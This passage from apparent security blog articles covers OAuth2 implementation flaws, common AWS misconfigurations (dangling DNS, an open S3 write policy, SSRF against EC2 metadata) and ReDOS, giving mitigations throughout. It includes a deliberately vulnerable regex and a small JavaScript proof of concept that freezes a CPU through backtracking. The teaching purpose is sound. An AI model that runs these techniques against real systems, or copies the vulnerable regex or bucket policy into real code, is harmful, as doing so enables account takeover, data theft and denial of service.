The redirect_uri parameter in the OAuth2 workflow is used by the authorization server as a location or address to deliver the access_token or auth_code by means of a browser redirect. In Figure 1, the redirect_uri parameter is initialized by the client application as part of the request to the authorization server in step 2, when a web user clicks the login button. After the authorization server validates the credentials (step 6), it sends back the auth_code (or the access_token for an implicit grant, step 7 in Figure 2) as a parameter to the redirect_uri used in step 2.

If a malicious user can trigger the victim to send a request to the authorization server with a redirect_uri controlled by the attacker, and the authorization server does NOT validate the redirect_uri, the access_token will be sent to the URI controlled by the attacker.

The case of stealing users’ OAuth tokens via redirect_uri is, unfortunately, a typical one, where the authorization server performs a poor validation on the redirect_uri and the attacker is able to bypass the validation with a malicious link they control.

Mitigation

Implement a robust redirect_uri validation on the authorization server by considering the following approach:

  1. Perform a match between client_id and redirect_uri to ensure the redirect_uri matches the one stored for that client_id in the authorization server.
  2. Use a whitelist approach if the number of client applications is manageable.
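The first approach above can be sketched as an exact-match check against the redirect URIs registered per client_id (the registry contents and names here are hypothetical):

```javascript
// Hypothetical registry: redirect URIs registered per client at app creation time
var registeredRedirects = {
  "client-123": ["https://app.example.com/oauth/callback"]
};

// Exact string match only: no startsWith()/indexOf() checks an attacker can bypass
function isValidRedirect(clientId, redirectUri) {
  var allowed = registeredRedirects[clientId] || [];
  return allowed.indexOf(redirectUri) !== -1;
}

console.log(isValidRedirect("client-123", "https://app.example.com/oauth/callback")); // true
console.log(isValidRedirect("client-123", "https://app.example.com.evil.net/cb"));    // false
```

Exact matching matters: several of the disclosed bypasses abused prefix or substring validation (for example, a registered domain appearing as a subdomain of an attacker's host).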

Vulnerability 2: Missing state parameter validation leads to CSRF attack

HackerOne Reports

https://hackerone.com/reports/111218

https://hackerone.com/reports/13555

In OAuth2 implementation, the state parameter (initialized under step 2) allows client applications to restore the previous state of the user. The state parameter preserves some state object set by the client in the authorization request and makes it available to the client in the response. 

Here is the correct implementation of the state parameter:

  1. The client application initializes the request to the authorization server with a state parameter in the request URL (Step 2).
  2. The client application stores the state parameter value in the current session (Step 2).
  3. The authorization server sends the access_token back to the client application (Step 7 in Figure 2) together with the state parameter.
  4. The client application performs a match between the state stored in the current session and the state parameter sent back from the authorization server. If they match, the access_token is consumed by the client application; otherwise, it is discarded, which prevents the CSRF attack.

However, since the state parameter is not required for a successful OAuth2 workflow, it is very often omitted or ignored during OAuth2 implementation. Without validation of the state parameter, a CSRF attack can be launched easily against the client application.

This HackerOne report is a very good example of how an attacker can attach their account to a different account in the client application due to the lack of a state parameter. Sometimes, even when the state parameter is present in the callback request from the authorization server, it is still possible that it is not validated, leaving the application vulnerable to CSRF attacks.

Mitigation

Ensure the state parameter is passed between requests and that state validation is implemented, so that an attacker cannot attach their account to the victim's account.

Vulnerability 3: Client_secret mistakenly disclosed to the public 

Hackerone Report

https://hackerone.com/reports/272824

https://hackerone.com/reports/397527

The client_secret is used by the client application when making the request to the authorization server to exchange the auth code for the access token (step 8 in Figure 1). The client_secret is a secret known only to the client application and the authorization server.

Some developers may accidentally disclose the client_secret to end users when the access_token retrieval request (step 8 in Figure 1) is mistakenly executed by front-end JavaScript code rather than performed over a back-end channel.

In reference to this HackerOne report about token disclosure, the client_secret is publicly exposed in the HTML page because the exchange of the auth_code for the access_token (step 8 in Figure 1) is executed by a piece of JavaScript code.

Mitigation

To avoid disclosing the client_secret to the public, it is best for developers to understand why they are implementing OAuth2, as there are different OAuth2 options to adopt for different applications. If your client application has a back-end server, the client_secret should never be exposed to the public, as the interaction with the authorization server can be completed over a back-end channel. If your client application is a single-page web application or mobile app, you should choose a different OAuth2 grant type: for example, the Authorization Code grant with PKCE.

Vulnerability 4: Pre-account takeover 

Hackerone Report

https://hackerone.com/reports/1074047

A pre-account takeover could occur when the following two conditions are met: 

  1. The client application supports multiple authentication methods, using a login with a password and a third-party service (like Facebook or Google) as an OAuth authentication provider.
  2. Either the client application or the third-party service does not perform email verification during the signup process.

This HackerOne report details how a misconfigured OAuth can lead to pre-account takeover:

  1. The attacker creates an account with the victim's email address and the attacker's password before the victim has registered on the client application.
  2. The victim then logs in through a third-party service, like Google or Facebook.
  3. The victim performs some sensitive actions in the client application. The client application saves these actions, likely using the email address as the identifier for its users in the database.
  4. Now the attacker can log in as the victim and read the sensitive data added by the victim, using the victim's email address and the password the attacker created in step 1.

Mitigation

Perform email validation when creating a new user.  

Vulnerability 5: OAuth2 access_token is leaked through referrer header 

Hackerone Reports

https://hackerone.com/reports/835437

https://hackerone.com/reports/787160

https://hackerone.com/reports/202781

One weak aspect of OAuth2's design is that the implicit grant type passes the access_token in the URL. Once you put sensitive data in a URI, you risk exposing it to third-party applications; this applies to OAuth2 implementations as well.

In this HackerOne report about access_token smuggling, for example, the access_token was exposed to a third-party website controlled by the attacker after a chained redirection by taking advantage of the referrer header.

Mitigation

As this is a design issue of OAuth2 itself, the easiest mitigation is strengthening the referrer header policy with <meta name="referrer" content="origin" />.

Vulnerability 6: OAuth2 login bypass due to lack of access_token validation

Hackerone Report

https://hackerone.com/reports/245408

A lack of access_token validation by the client application makes it possible for an attacker to log in to other users’ accounts without knowing their password.

Once the authorization server sends the access_token back, the client application sometimes needs to bind the access_token to a user identity so that it can be stored in a session. This vulnerability is exploited when an attacker binds their own access_token to another user's identity and then impersonates that user without logging in.

In this HackerOne report, the security researcher was able to log in as any user just by supplying the victim's email address, because the client application did not validate whether the access_token belonged to the correct owner.

Mitigation

Validation should be performed on the client application side to check whether the user actually owns the access_token.

Summary

The OAuth2 framework is complicated and offers a lot of implementation flexibility. Due to this flexibility, however, the security of an OAuth2 implementation is in the hands of the developers. Developers with a strong security mindset can make an implementation more secure; conversely, developers with less security training are likely to introduce security holes during OAuth2 implementation. For any organization, it's vital to train and educate your developers in the latest security best practices to reduce risk during OAuth2 implementation.

Five Common AWS Misconfigurations from Pentest Perspective

Shifting to the cloud is becoming more prevalent, as a cloud-based platform can provide operational efficiency and simplicity when security best practices and proper configuration are applied. However, a misconfiguration in AWS can sometimes lead to deadly data breaches.

Common misconfigurations in AWS cloud

In this article, we will break down, from a pentest perspective, the 5 most common misconfigurations or oversights that could lead to a nasty data breach.

Misconfiguration 1:  Dangling DNS Records lead to Subdomain takeover

If a DNS record entry points to a resource (for example, an S3 bucket, IP address, or CloudFront instance) that is no longer available, while the DNS record is still present in your DNS zone, it is called a “dangling DNS” record. A dangling DNS record in your AWS configuration is likely to lead to subdomain takeover exploitation.

When an attacker finds a dangling DNS record, they can claim the unavailable or non-existent resource (S3 bucket, IP address, etc.) and host malicious content on it. When users then visit the DNS domain in their browsers, their traffic is directed to the malicious content controlled by the attacker.

Take the following scenario for a better illustration:

  1. An organization creates a DNS record files.example.org with a CNAME to an AWS S3 bucket filessharing_example.s3.amazonaws.com to host some static JavaScript files.
  2. The organization deletes the S3 bucket, or the bucket expires and is not renewed. AWS recycles the bucket name and makes it available for other users to claim.
  3. An attacker finds that the DNS record files.example.org points to a non-existent S3 bucket, claims the bucket, and hosts malicious content in it.
  4. Now when victims visit files.example.org in their browsers, they are served the malicious content controlled by the attacker.

S3 bucket takeover is the most common exploitation seen when performing penetration tests because the exploitation is very straightforward and simple.

Mitigations

The mitigation for dangling DNS is easy: keep robust hygiene practices. When a resource in your AWS account is deleted or removed, you need to sunset or delete the corresponding DNS record too.

Misconfiguration 2: Internal servers deployed in public subnets

AWS provides a default VPC for a new account. Sometimes a developer deploys a server and database directly in the default public subnet of that VPC to speed up deployment for testing or POC purposes.

Take the following scenario as an example: a developer was preparing a POC for potential clients. To ensure the clients could access the service, the developer deployed an EC2 instance with the demo into a public subnet. As a consequence, this could lead to a potential data breach if the EC2 instance hosts an internal application or has a database installed on it.

Mitigation

Deploy internal servers in private subnets and set up correct security groups to limit access to the right groups of applications. If the server is a public-facing application, ensure that only the necessary ports are open.

Misconfiguration 3: Over permissive S3 bucket

Misconfigured S3 bucket permissions have been identified as the root cause of many data breaches, even though AWS sets all buckets and their objects private by default.

Most of these incidents happen when the resource-based policies (bucket policies) are not correctly configured. In a bucket policy, the owner of the bucket specifies which users have which kinds of permissions (read, write, list) on the bucket. A developer or owner could mistakenly grant permissions to undesired users.

Take the following publicly disclosed incident as an example, where the organization used the following bucket policy to configure permissions for its S3 bucket:

{
  "Sid": "AllowPublicRead",
  "Effect": "Allow",
  "Principal": {
    "AWS": "*"
  },
  "Action": [
    "s3:GetObject",
    "s3:PutObject"
  ],
  "Resource": "arn:aws:s3:::media.twiliocdn.com/taskrouter/*"
}

This bucket policy means anyone can read and write any file under the /taskrouter/ directory of this bucket.
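A tighter policy for the same use case (a hedged sketch keeping the example's bucket name and path) drops s3:PutObject entirely and allows public access only for reads that are genuinely needed:

```json
{
  "Sid": "AllowPublicReadOnly",
  "Effect": "Allow",
  "Principal": {
    "AWS": "*"
  },
  "Action": [
    "s3:GetObject"
  ],
  "Resource": "arn:aws:s3:::media.twiliocdn.com/taskrouter/*"
}
```

If writes are required at all, they should be granted to specific IAM principals rather than to `"AWS": "*"`.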

Mitigation

Follow the security best practices listed by AWS when configuring your S3 buckets: for example, apply least-privilege access, enable data encryption, and block public access to the bucket.

Misconfiguration 4:  EC2 Metadata Service leaks Secret Token via SSRF

SSRF became a new category in the OWASP Top 10 (2021), as it enables attackers to use vulnerable servers to request and receive data from protected internal resources, leading to serious attacks. The impact of SSRF is worsened by public cloud offerings like AWS. For example, the notorious Capital One data breach was caused by SSRF exploitation. For a penetration tester, stealing EC2 metadata containing AWS credentials has become a standard POC to demonstrate the exploitability and damage of SSRF vulnerabilities.

The following two factors account for the widespread SSRF attacks against the AWS cloud:

 1) a metadata service is running at http://169.254.169.254 on most EC2 instances, and

 2) the service reveals the IAM credentials of the role attached to the EC2 instance.

Mitigations

Enforcing IMDSv2 on your EC2 instances can significantly reduce the risk of SSRF attacks, as IMDSv2 requires a PUT request to obtain a session token prior to extracting the AWS credentials with a GET request.

Misconfiguration 5:  Private AMIs got shared with public

Accidentally public Amazon Machine Images (AMIs) are another common security issue observed during penetration testing. AWS allows its customers to customize an instance (for example, installing software or configuring sensitive environment variables on the instance) and then save it as a custom AMI.

Once a customized AMI is saved, it can be shared between accounts or with the public. Sometimes an AMI is shared with the public by mistake, which leads to sensitive data leakage if the AMI contains sensitive information.

Conclusion

There are far more misconfigurations that could put your cloud platform in jeopardy; these 5 are, from my experience performing penetration tests, the most common ones in AWS cloud infrastructure.

Needless to say, securely configuring a cloud-based platform on AWS is a very challenging task, as AWS itself is complex and it takes time and effort to understand all the features and options. Sometimes this is made worse when the recommended configuration or setting is not suitable for your organization or platform.

However, the aforementioned 5 common misconfigurations are not hard to discover if you follow the AWS security best practices and perform regular audits of your platform.

ReDOS, it could be the cause of your next security incident

Regardless of which position you fill in your organization's development lifecycle, regular expressions are useful tools for making your work more efficient. While writing a basic regex might not be very hard, crafting a robust and secure one can be a real challenge.

You may recall that some security incidents were caused by an insufficient regex pattern, where malicious user input was NOT blocked or detected by the regex. That is indeed a very common scenario of a poor regex leading to a security incident. In this article, however, I would like to discuss the danger of poorly designed regexes from a different perspective: ReDOS, which in my opinion is a security issue overlooked by many developers and security engineers.

ReDOS, an overlooked security risk

Before we start exploring ReDOS, we need to understand two basics: 1) a regular expression is a sequence of characters that specifies a search pattern in text, commonly used by string-searching algorithms; 2) when regex matching (string searching) is performed, the engine behind the scenes uses a backtracking algorithm, a brute-force method that tries every possible path through the input that might match the regex, which means a single match can take practically unbounded time. That is the root cause of the denial of service caused by regular expressions: ReDOS, for short.

Though the severity of ReDOS can be critical, as it can paralyze your web server with a single malformed string, this vulnerability is often overlooked by security engineers because they 1) are not able to identify a regex with a potential ReDOS vulnerability, 2) ignore or underestimate its risk, or 3) are not able to craft a malicious string to demonstrate the exploitation. As a security engineer, I used to downplay the severity of ReDOS as well: I was not persuaded that one single string could totally freeze a web server. I started to change my mind after I exploited a ReDOS vulnerability, introduced by an inefficient regex, with an elaborate string. During the exploitation, that string consumed 100% of the server's CPU while the regex match between the string (payload) and the regex was performed.

How did I start?

While performing static code analysis against a piece of code with the help of a SAST tool, I found a vulnerability flagged against the following regex, stating that it could lead to a ReDOS attack. (Note: the regex has been modified to make the POC easier to follow.)

var regex = /^([\sa-z!#]|\w#\w|[\s\w]+")*$/g // ^ and $ replace the \A and \z anchors, which JavaScript does not support

After reviewing the regex, I started to craft a matching string using the online tool https://regex101.com/. It did not take me long to find that regex101 reports a Catastrophic backtracking error when evaluating the following string.

That error message clearly shows the regex has a flaw. I then used the debugger functions provided by regex101 to see how the backtracking steps are created. The debugger indicated that there are group repetitions in the regex, which send the backtracking into a combinatorial explosion.

After figuring out that a ReDOS vulnerability could be exploited, I created the following POC code and ran it on a free-tier AWS EC2 t2.micro instance (1 GB RAM).
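A hedged reconstruction of such a POC (the regex is adapted to JavaScript anchors and the payload shape is my assumption, not the original) could look like this; be careful with large k values, since the work grows roughly exponentially:

```javascript
// Reconstruction of the POC idea (not the original code)
var evil = /^([\sa-z!#]|\w#\w|[\s\w]+")*$/;

// Each 'aa"' segment can be parsed ambiguously (the a's split between the
// single-char alternative and [\s\w]+"), and the trailing '%' matches no
// alternative, so the engine must backtrack through every combination.
function timeMatch(k) {
  var payload = new Array(k + 1).join('aa"') + "%";
  var start = Date.now();
  evil.test(payload);
  return Date.now() - start; // elapsed milliseconds
}

console.log(timeMatch(10)); // small k: near-instant
// Increasing k makes the backtracking paths multiply; past a few dozen
// segments a single test() call can pin a CPU core at 100%
```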

The CPU usage of the EC2 instance spiked to 100% once the length of the test payload reached 99 characters, which really surprised me.

The above POC definitely changed my understanding of ReDOS: the impact can be catastrophic. You might now be asking yourself how to spot this kind of vulnerability in your code and eliminate it before it gets exploited.

Identify ReDOS vulnerabilities in your code

It is relatively complicated to determine whether your regex is vulnerable to ReDOS. However, a couple of approaches can make it a little bit easier for you.

Use some patterns to evaluate your Regex

As suggested by OWASP, there are so-called patterns that identify an evil regex:

  • Grouping with repetition
  • Inside the repeated group:
    • Repetition
    • Alternation with overlapping

When you find a regex with repetition patterns, for example a + applied inside or to a group, you should start paying attention to it, as it matches the patterns above.

Use some automation tools

There are also some automation tools you may be able to use: for example, rxxr2 and ReScue are open source tools that work neatly. If your source code is hosted on GitHub and you have GitHub Advanced Security enabled, you can also scan your code with CodeQL, and vulnerable regexes will be flagged, though you still need to verify them manually.

Conclusion

Composing an efficient and robust regex is hard, and spotting a regex vulnerable to ReDOS is not easy either. This article attempts to explore the basic problems of ReDOS and, through a concrete example, how to identify and exploit it with the help of some tools.

As stated above, most developers, and even security engineers, are not really aware of the potential risks of an inefficient regex. The best way to avoid the ReDOS risk caused by an inefficient regex is to inform your developers and security engineers about the danger of ReDOS and to perform a thorough code review and testing whenever a regex has to be used in your code.